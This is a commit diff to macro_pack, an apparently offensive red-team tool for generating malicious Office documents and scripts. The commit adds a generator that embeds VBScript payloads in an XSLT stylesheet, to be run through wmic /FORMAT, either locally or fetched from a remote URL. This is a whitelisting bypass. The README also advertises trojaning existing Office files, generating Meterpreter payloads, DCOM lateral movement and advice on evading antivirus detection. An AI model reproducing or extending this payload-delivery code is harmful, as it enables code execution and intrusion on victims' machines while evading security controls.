Add malicious XSLT Stylesheet generation

README.md

@@ -42,7 +42,7 @@ Note that the main goal of macro\_pack obfuscation is not to prevent reverse eng
 Macro Pack can generate several kind of MS office documents and scripts formats.
 The format will be automatically guessed depending on the given file extension.
 File generation is done using the option --generate or -G. 
-Macro Pack pro version also allow to trojan existing files with option --trojan or -T
+Macro Pack pro version also allow to trojan existing Office files with option --trojan or -T
 
 Ms Office Supported formats are:
 * MS Word 97 (.doc)
@@ -60,6 +60,7 @@ Scripting (txt) supported formats are:
 * Windows Script File (.wsf)
 * Windows Script Components scriptlets (.wsc, .sct)
 * HTML Applications (.hta)
+* XSLT Stylesheet (.xsl) (Yes MS XSLT contains scripts ^^)
 
 Shortcuts supported formats are:
 * Shell Link (.lnk)
@@ -89,7 +90,7 @@ The pro mode includes features such as:
 * Lateral movement using DCOM objects
 * Anti-debug using http://seclists.org/fulldisclosure/2017/Mar/90
 
-For now I do not plan to release or sell this pro version however if you are really interested I can share pro binary in the next case:
+For now I do not plan to release or sell this pro version however if you are really interested I can share code in the next case:
 * You significantly contribute to macro\_pack on GitHub + I need to know your identity
 
 
@@ -310,7 +311,7 @@ echo 192.168.0.5 4444 | macro_pack.exe -t METERPRETER -o -G "\\192.168.0.8\c$\us
  -G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the format based on extension.
  Supported Ms Office extensions are: doc, docm, docx, xls, xlsm, xslx, pptm, vsd, vsdm, mpp.
  Note: Ms Office file generation requires Windows OS with right MS Office application installed.
- Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta.
+ Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta, xsl.
  Supported shortcuts extensions are: scf, url, glk
  
  -e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document.
@@ -482,7 +483,8 @@ If you have an issue with macro\_pack AV detection you can write to us for advic
 
 ## Relevant resources
 
-Blog posts about MS Office & retro stuff security:
+Blog posts about hacking with MS Office, VBS, and other retro stuff security:
+ - https://subt0x11.blogspot.fr/2018/04/wmicexe-whitelisting-bypass-hacking.html
  - http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)
  - http://blog.sevagas.com/?Hacking-around-HTA-files (run hta code in non-hta files and hta polyglots)
  - http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.html
@@ -500,7 +502,7 @@ Blog posts about MS Office & retro stuff security:
  - https://www.metasploit.com/
  - https://github.com/Cn33liz/MacroMeter
  - https://github.com/khr0x40sh/MacroShop
-
+ - https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
 
 ## Contact
 

src/common/help.py

@@ -177,7 +177,7 @@ def printUsage(banner, currentApp, mpSession):
  -G, --generate=OUTPUT_FILE_PATH. Generates a file. Will guess the format based on extension.
  Supported Ms Office extensions are: doc, docm, docx, xls, xlsm, xslx, pptm, vsd, vsdm, mpp.
  Note: Ms Office file generation requires Windows OS with right MS Office application installed.
- Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta.
+ Supported Visual Basic scripts extensions are: vba, vbs, wsf, wsc, sct, hta, xsl.
  Supported shortcuts extensions are: lnk, scf, url, glk
  
  -e, --embed=EMBEDDED_FILE_PATH Will embed the given file in the body of the generated document.

src/common/utils.py

@@ -59,17 +59,18 @@ class MSTypes():
  LNK="Shell Link"
  GLK = "Groove Shortcut"
  SCF="Explorer Command File"
+ XSL="XSLT Stylesheet"
  URL="URL Shortcut"
  UNKNOWN = "Unknown"
 
  MS_OFFICE_FORMATS = [ XL, XL97, WD, WD97, PPT, MPP, VSD, VSD97] # Formats supported by macro_pack
- VB_FORMATS = [VBA, VBS, HTA, SCT, WSF ]
+ VB_FORMATS = [VBA, VBS, HTA, SCT, WSF, XSL ]
  VB_FORMATS.extend(MS_OFFICE_FORMATS)
  Shortcut_FORMATS = [LNK, GLK, SCF, URL]
 
  EXTENSION_DICT = { LNK:".lnk", GLK:".glk", SCF:".scf", URL:".url", XL:".xlsm", XL97:".xls", WD:".docm",
  WD97:".doc", PPT:".pptm", PPT97:".ppt", MPP:".mpp", PUB:".pub", VSD:".vsdm", VSD97:".vsd", 
- VBA:".vba", VBS:".vbs", HTA:".hta", SCT:".wsc", WSF:".wsf" }
+ VBA:".vba", VBS:".vbs", HTA:".hta", SCT:".wsc", WSF:".wsf", XSL:".xsl" }
 
  @classmethod
  def guessApplicationType(self, documentPath):
@@ -114,6 +115,8 @@ def guessApplicationType(self, documentPath):
  result = self.LNK
  elif ".scf" == extension.lower():
  result = self.SCF
+ elif ".xsl" == extension.lower():
+ result = self.XSL
  else:
  result = self.UNKNOWN
  return result

src/macro_pack.py

@@ -22,6 +22,7 @@
 from modules.com_run import ComGenerator
 from modules.listen_server import ListenServer
 from modules.scf_gen import SCFGenerator
+from modules.xsl_gen import XSLGenerator
 from modules.url_gen import UrlShortcutGenerator
 from modules.glk_gen import GlkGenerator
 from modules.lnk_gen import LNKGenerator
@@ -366,6 +367,10 @@ def main(argv):
  if mpSession.outputFileType == MSTypes.SCF:
  generator = SCFGenerator(mpSession)
  generator.run()
+
+ if mpSession.outputFileType == MSTypes.XSL:
+ generator = XSLGenerator(mpSession)
+ generator.run()
 
  if mpSession.outputFileType == MSTypes.URL:
  generator = UrlShortcutGenerator(mpSession)

src/modules/xsl_gen.py

@@ -0,0 +1,56 @@
+#!/usr/bin/env python
+# encoding: utf-8
+
+import logging
+from modules.vbs_gen import VBSGenerator
+
+XSL_TEMPLATE = \
+r"""<?xml version='1.0'?>
+<xsl:stylesheet xmlns:xsl="http://www.w3.org/TR/WD-xsl">
+
+<xsl:script language="VBScript"><![CDATA[ 
+<<<VBS>>>
+<<<MAIN>>>
+
+
+]]>
+</xsl:script>
+</xsl:stylesheet>
+"""
+
+
+
+class XSLGenerator(VBSGenerator):
+ """ Module used to generate XSL file from working dir content
+ To execute: 
+ wmic os get /FORMAT:test.xsl
+ Also work on remote files
+ wmic os get /FORMAT:http://www.domain.blah/hello.xsl
+ """
+
+
+ def generate(self):
+ logging.info(" [+] Generating %s file..." % self.outputFileType)
+ self.vbScriptConvert()
+ f = open(self.getMainVBAFile()+".vbs")
+ vbsContent = f.read()
+ f.close()
+
+ XSL_ECHO= r"""CreateObject("WScript.Shell").Run("cmd /c echo XSLT does not handle output message! & PAUSE") '""" 
+ vbsContent = vbsContent.replace("WScript.Echo ", XSL_ECHO)
+
+ # Write VBS in template
+ xslContent = XSL_TEMPLATE
+ xslContent = xslContent.replace("<<<VBS>>>", vbsContent)
+ xslContent = xslContent.replace("<<<MAIN>>>", self.startFunction)
+ # Write in new HTA file
+ f = open(self.outputFilePath, 'w')
+ f.writelines(xslContent)
+ f.close()
+ logging.info(" [-] Generated %s file: %s" % (self.outputFileType, self.outputFilePath))
+ logging.info(" [-] Test with : \nwmic os get /FORMAT:\"%s\"\n" % self.outputFilePath)
+
+
+
+
+